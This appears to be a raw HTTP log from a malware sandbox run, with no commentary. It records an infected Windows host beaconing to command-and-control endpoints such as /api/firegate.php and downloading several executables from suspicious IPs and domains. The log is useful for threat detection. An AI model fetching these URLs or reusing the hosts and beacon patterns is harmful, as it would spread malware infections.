GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:00 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:01 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:07 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 4120 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.6 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK etag: "63400-649cd08b-4054e;;;" last-modified: Thu, 29 Jun 2023 00:30:03 GMT content-type: application/x-executable content-length: 406528 accept-ranges: bytes date: Thu, 29 Jun 2023 00:44:53 GMT server: LiteSpeed connection: Keep-Alive

HEAD /gallery/photo085.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 83.97.73.134 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Length: 838792 Content-Type: application/octet-stream Last-Modified: Thu, 29 Jun 2023 00:41:48 GMT Accept-Ranges: bytes ETag: "3fda37c22aad91:0" Server: Microsoft-IIS/10.0 Date: Thu, 29 Jun 2023 00:44:08 GMT

HEAD /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 29 Jun 2023 00:44:08 GMT Content-Type: application/octet-stream Content-Length: 321024 Last-Modified: Wed, 28 Jun 2023 03:53:04 GMT Connection: keep-alive ETag: "649baea0-4e600" Accept-Ranges: bytes

GET /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 29 Jun 2023 00:44:08 GMT Content-Type: application/octet-stream Content-Length: 321024 Last-Modified: Wed, 28 Jun 2023 03:53:04 GMT Connection: keep-alive ETag: "649baea0-4e600" Accept-Ranges: bytes

GET /gallery/photo085.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 83.97.73.134 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 29 Jun 2023 00:41:48 GMT Accept-Ranges: bytes ETag: "3fda37c22aad91:0" Server: Microsoft-IIS/10.0 Date: Thu, 29 Jun 2023 00:44:08 GMT Content-Length: 838792

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT ETag: "37d-5f433188daa00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 29 Jun 2023 01:44:09 GMT Date: Thu, 29 Jun 2023 00:44:09 GMT Connection: keep-alive

HEAD /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Thu, 29 Jun 2023 00:44:10 GMT Content-Type: application/octet-stream Content-Length: 317440 Last-Modified: Thu, 29 Jun 2023 00:30:02 GMT Connection: keep-alive ETag: "649cd08a-4d800" Accept-Ranges: bytes

GET /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Thu, 29 Jun 2023 00:44:10 GMT Content-Type: application/octet-stream Content-Length: 317440 Last-Modified: Thu, 29 Jun 2023 00:30:02 GMT Connection: keep-alive ETag: "649cd08a-4d800" Accept-Ranges: bytes

GET /2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.6 Cache-Control: no-cache

HTTP/1.1 200 OK etag: "63400-649cd08b-4054e;;;" last-modified: Thu, 29 Jun 2023 00:30:03 GMT content-type: application/x-executable content-length: 406528 accept-ranges: bytes date: Thu, 29 Jun 2023 00:44:53 GMT server: LiteSpeed connection: Keep-Alive

GET /sts/imagc.jpg HTTP/1.1 User-Agent: HTTPREAD Host: us.imgjeoigaa.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 29 Jun 2023 00:44:52 GMT Content-Type: image/jpeg Content-Length: 1506508 Last-Modified: Wed, 28 Jun 2023 02:36:24 GMT Connection: keep-alive ETag: "649b9ca8-16fccc" Accept-Ranges: bytes

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 541 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:54 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:55 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:55 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /check/safe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Thu, 29 Jun 2023 00:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

POST /check/?sid=210562&key=5227fd466f380e354858165319182c99 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Content-Length: 160 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Thu, 29 Jun 2023 00:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:56 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Thu, 29 Jun 2023 00:44:57 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Thu, 29 Jun 2023 01:44:57 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 7dea24db0a1dc09b-ICN

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Thu, 29 Jun 2023 00:44:58 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Thu, 29 Jun 2023 01:44:58 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 7dea24df0a8cc091-ICN

POST /doma/net/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.63 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:45:29 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 254 Content-Type: text/html; charset=UTF-8

GET /smoke/foto172.exe HTTP/1.1 Host: 83.97.73.129

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 29 Jun 2023 00:43:45 GMT Accept-Ranges: bytes ETag: "659cfc222aad91:0" Server: Microsoft-IIS/10.0 Date: Thu, 29 Jun 2023 00:45:30 GMT Content-Length: 526472

POST /doma/net/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.63 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:45:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 3 Content-Type: text/html; charset=UTF-8

GET /smoke/fotod95.exe HTTP/1.1 Host: 83.97.73.129

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 29 Jun 2023 00:42:08 GMT Accept-Ranges: bytes ETag: "6090df8822aad91:0" Server: Microsoft-IIS/10.0 Date: Thu, 29 Jun 2023 00:45:32 GMT Content-Length: 541320

POST /doma/net/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.63 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:45:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 3 Content-Type: text/html; charset=UTF-8

GET /test1/mu.exe HTTP/1.1 Host: 83.97.73.129

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 26 Jun 2023 16:10:23 GMT Accept-Ranges: bytes ETag: "1c2f35b648a8d91:0" Server: Microsoft-IIS/10.0 Date: Thu, 29 Jun 2023 00:45:34 GMT Content-Length: 30720

POST /doma/net/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.63 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:45:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 3 Content-Type: text/html; charset=UTF-8

GET /fuzz/enter.exe HTTP/1.1 Host: 77.91.68.30

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:45:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 29 Jun 2023 00:21:36 GMT ETag: "1bbed9-5ff39aee4c400" Accept-Ranges: bytes Content-Length: 1818329 Content-Type: application/x-msdos-program